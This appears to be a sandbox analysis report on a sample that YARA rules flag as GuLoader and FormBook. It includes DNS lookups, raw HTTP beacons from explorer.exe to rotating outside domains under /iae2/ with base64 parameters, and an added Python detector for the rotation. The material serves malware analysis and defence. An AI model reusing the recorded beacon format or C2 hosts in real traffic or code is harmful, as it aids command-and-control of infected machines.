Feb 25, 2021 15:49:46.569489002 CET | 8.8.8.8 | 192.168.2.6 | 0x3499 | No error (0) | www.africabiocity.com | africabiocity.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:49:46.569489002 CET | 8.8.8.8 | 192.168.2.6 | 0x3499 | No error (0) | africabiocity.com | | 199.79.62.169 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:52.389069080 CET | 8.8.8.8 | 192.168.2.6 | 0x409f | Name error (3) | www.weebflix.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:49:57.477340937 CET | 8.8.8.8 | 192.168.2.6 | 0x946c | No error (0) | www.nhadat9chu.com | | 103.28.36.171 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:03.171494007 CET | 8.8.8.8 | 192.168.2.6 | 0x237b | No error (0) | www.kfs.ltd | www22.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:50:03.171494007 CET | 8.8.8.8 | 192.168.2.6 | 0x237b | No error (0) | www22.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:50:03.171494007 CET | 8.8.8.8 | 192.168.2.6 | 0x237b | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:50:03.171494007 CET | 8.8.8.8 | 192.168.2.6 | 0x237b | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-dc11-60-102.wixdns.net | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:50:03.171494007 CET | 8.8.8.8 | 192.168.2.6 | 0x237b | No error (0) | td-balancer-dc11-60-102.wixdns.net | | 185.230.60.102 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:08.828957081 CET | 8.8.8.8 | 192.168.2.6 | 0x2f27 | Server failure (2) | www.prepa-tests.com | none | none | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:13.916348934 CET | 8.8.8.8 | 192.168.2.6 | 0xf88 | No error (0) | www.lvlyourlife.com | lvlyourlife.com | | CNAME (Canonical name) | IN (0x0001)
Feb 25, 2021 15:50:13.916348934 CET | 8.8.8.8 | 192.168.2.6 | 0xf88 | No error (0) | lvlyourlife.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Feb 25, 2021 15:50:19.287266016 CET | 8.8.8.8 | 192.168.2.6 | 0xcc85 | No error (0) | www.angelises.com | | 162.210.102.231 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.guidedcommercialloan.com
• www.discbrakepart.com
• www.truckrev.com
• www.quartiercreole.net
• www.wissinkadams.com
• www.shopping-container.com
• www.azhello.com
• www.africabiocity.com
• www.nhadat9chu.com
• www.kfs.ltd
• www.lvlyourlife.com
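
Every host in this graph is contacted the same way. The sessions in the HTTP Packets section below are all issued by C:\Windows\explorer.exe (the system process the report flags as connecting to the network), all use the path /iae2/, all carry one long base64 parameter plus the constant uVjH=yVCTVb0XT254cnY, all send Connection: close followed by seven null bytes, and the hosts rotate a few seconds apart while the servers answer 403 or 302. The following is an added example, not part of this report and not Joe Sandbox code, of detection logic that flags that rotation over a constructed copy of those requests. SHELL_PROCESSES, MIN_HOSTS, WINDOW_SECONDS and the benign browser.exe entry are assumptions of the example.

```python
import base64
import binascii
from collections import defaultdict
from datetime import datetime

# Constructed from the HTTP Packets section of the report: one entry per
# session (timestamp, process, Host header, request line, response status).
# The last entry is a made-up benign request, added to show what is NOT flagged.
SESSIONS = [
    ("2021-02-25 15:49:04.064583", r"C:\Windows\explorer.exe", "www.guidedcommercialloan.com",
     "GET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1", 403),
    ("2021-02-25 15:49:09.333920", r"C:\Windows\explorer.exe", "www.discbrakepart.com",
     "GET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1", 403),
    ("2021-02-25 15:49:19.806034", r"C:\Windows\explorer.exe", "www.truckrev.com",
     "GET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1", 302),
    ("2021-02-25 15:49:24.992497", r"C:\Windows\explorer.exe", "www.quartiercreole.net",
     "GET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1", 403),
    ("2021-02-25 15:50:13.958388", r"C:\Windows\explorer.exe", "www.lvlyourlife.com",
     "GET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1", 403),
    ("2021-02-25 15:50:20.000000", r"C:\Program Files\Browser\browser.exe", "www.example.com",
     "GET /index.html?page=2&lang=en HTTP/1.1", 200),
]

# Assumptions of this example, not from the report: processes that have no
# business originating plain-HTTP GETs to arbitrary domains, and how many
# distinct hosts inside one window make the rotation worth an alert.
SHELL_PROCESSES = {"explorer.exe", "svchost.exe", "wininit.exe"}
MIN_HOSTS = 3
WINDOW_SECONDS = 300


def parse_request(line):
    """Return (path, [(key, value), ...]) for a GET request line, else None.
    The query is split by hand: parse_qsl would turn '+' into a space and break base64."""
    parts = line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return None
    path, _, query = parts[1].partition("?")
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    return path, params


def is_opaque_blob(value):
    """True when value is strict base64 decoding to 32+ bytes: an encrypted payload, not a page id."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    return len(raw) >= 32


def beacon_like(process, request_line):
    """Per-request heuristic: shell process, exactly one opaque blob and one short constant.
    Returns the (path, key, value) that ties a rotation together, or None."""
    parsed = parse_request(request_line)
    if parsed is None:
        return None
    path, params = parsed
    if process.rsplit("\\", 1)[-1].lower() not in SHELL_PROCESSES:
        return None
    if len(params) != 2:
        return None
    (_, blob), (const_key, const_val) = params
    if not is_opaque_blob(blob) or not (8 <= len(const_val) <= 24 and const_val.isalnum()):
        return None
    return path, const_key, const_val


def find_rotations(sessions):
    """Group beacon-like requests by (path, constant) and alert when MIN_HOSTS+ hosts fall in one window."""
    groups = defaultdict(list)
    for ts, process, host, request_line, status in sessions:
        key = beacon_like(process, request_line)
        if key:
            groups[key].append((datetime.fromisoformat(ts), host, status))
    alerts = []
    for (path, const_key, const_val), hits in groups.items():
        hits.sort()
        hosts = sorted({h for _, h, _ in hits})
        span = (hits[-1][0] - hits[0][0]).total_seconds()
        if len(hosts) >= MIN_HOSTS and span <= WINDOW_SECONDS:
            alerts.append({"path": path, "constant": f"{const_key}={const_val}", "hosts": hosts,
                           "span_seconds": span, "statuses": sorted({s for _, _, s in hits})})
    return alerts
```

Keying the cluster on the constant parameter rather than on the destination is what makes the rotation visible: each host is hit once, so a per-host threshold never fires, and blocking any single domain from this list would not have stopped the next beacon. The 403 and 302 replies recorded above are consistent with parked or unrelated sites rather than a live panel, which is why the rotation itself, not the response, is the indicator.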

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49743 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:04.064583063 CET | 2525 | OUT | GET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
Host: www.guidedcommercialloan.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 25, 2021 15:49:04.204483986 CET | 2525 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 25 Feb 2021 14:49:04 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60363547-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49749 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:09.333920002 CET | 6438 | OUT | GET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1
Host: www.discbrakepart.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 25, 2021 15:49:09.474284887 CET | 6438 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 25 Feb 2021 14:49:09 GMT
Content-Type: text/html
Content-Length: 275
ETag: "603155b8-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49764 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:50:13.958388090 CET | 6509 | OUT | GET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1
Host: www.lvlyourlife.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 25, 2021 15:50:14.098751068 CET | 6510 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 25 Feb 2021 14:50:14 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60363547-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49750 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:19.806034088 CET | 6463 | OUT | GET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
Host: www.truckrev.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 25, 2021 15:49:19.855556011 CET | 6463 | IN | HTTP/1.1 302 Found
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49751 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:24.992497921 CET | 6464 | OUT | GET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.quartiercreole.net
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:49:25.133006096 CET | 6464 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 25 Feb 2021 14:49:25 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "60363547-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49752 | 34.98.99.30 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:30.250901937 CET | 6465 | OUT | GET /iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.wissinkadams.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:49:30.390222073 CET | 6466 | IN | HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 25 Feb 2021 14:49:30 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "603155b8-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49753 | 198.54.117.211 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:35.694806099 CET | 6467 | OUT | GET /iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.shopping-container.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49759 | 18.189.205.91 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:41.207811117 CET | 6492 | OUT | GET /iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.azhello.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:49:41.344544888 CET | 6493 | IN | HTTP/1.1 404 Not Found
    Date: Thu, 25 Feb 2021 14:49:41 GMT
    Content-Type: text/html
    Content-Length: 153
    Connection: close
    Server: nginx/1.16.1
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.6 | 49760 | 199.79.62.169 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:46.746673107 CET | 6495 | OUT | GET /iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.africabiocity.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:49:47.960475922 CET | 6495 | IN | HTTP/1.1 301 Moved Permanently
    Date: Thu, 25 Feb 2021 14:49:46 GMT
    Server: Apache
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Upgrade: h2,h2c
    Connection: Upgrade, close
    Location: https://www.africabiocity.com/iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.6 | 49762 | 103.28.36.171 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:49:57.717503071 CET | 6506 | OUT | GET /iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.nhadat9chu.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:49:58.079749107 CET | 6506 | IN | HTTP/1.1 301 Moved Permanently
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Expires: Wed, 11 Jan 1984 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate, max-age=0
    X-Redirect-By: WordPress
    Location: https://www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY
    Content-Length: 0
    Date: Thu, 25 Feb 2021 14:49:57 GMT
    Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.6 | 49763 | 185.230.60.102 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 25, 2021 15:50:03.338769913 CET | 6507 | OUT | GET /iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY HTTP/1.1
    Host: www.kfs.ltd
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Feb 25, 2021 15:50:03.487498999 CET | 6508 | IN | HTTP/1.1 301 Moved Permanently
    Date: Thu, 25 Feb 2021 14:50:03 GMT
    Content-Length: 0
    Connection: close
    location: https://www.kfs.ltd/iae2?Cb=2Mu6jGWgIoofF63Ti3l%2FZo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA%3D%3D&uVjH=yVCTVb0XT254cnY
    strict-transport-security: max-age=120
    x-wix-request-id: 1614264603.42118586673856126181
    Age: 0
    Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42
    X-Seen-By: jeslxIFvDH4ulYwNNi+3Muwfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVhT9gRHUF6iCEZerWBFcnqX,2d58ifebGbosy5xc+FRalp0JW3SHyhzs9FHT6/ij6dLDCec7qa/EMLCChW50N7/00YaveWPTFu/8+Yg3CfH40w==,2UNV7KOq4oGjA5+PKsX47JeSAtYJ4i5JfWbg2xSNjS4=,m0j2EEknGIVUW/liY8BLLkiHzpTYSDRA7u88Ic3Fde7V0TBmJ+uLPQ4OZPC1VSMH,8Jozq2XDr5/0Pv3E0yMndyYULW1yPqALTkG175wImb9Gp/J3MBzgzU8QHrQuh4zQ,9phxMuSXVGy04obH0oEnZbxJXFeoENGzEv6d1YOaTWMegIHNMbeN98wDstUop/lBWIHlCalF7YnfvOr2cMPpyw==
    Cache-Control: no-cache
    Expires: -1
    Server: Pepyaka/1.15.10


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Feb 25, 2021 15:48:25.025437117 CET | 142.250.184.65 | 443 | 192.168.2.6 | 49727 | CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Tue Jan 26 10:05:02 CET 2021 | Tue Apr 20 11:05:01 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
(same handshake, issuer certificate in chain) | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | |

Behavior

System Behavior

General

Start time:15:48:04
Start date:25/02/2021
Path:C:\Users\user\Desktop\211094.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\211094.exe'
Imagebase:0x400000
File size:98304 bytes
MD5 hash:A2BC516696C51F3AFDD8721D6C782360
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Visual Basic
Reputation:low

General

Start time:15:48:13
Start date:25/02/2021
Path:C:\Users\user\Desktop\211094.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\211094.exe'
Imagebase:0x400000
File size:98304 bytes
MD5 hash:A2BC516696C51F3AFDD8721D6C782360
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000004.00000002.399305439.0000000000562000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
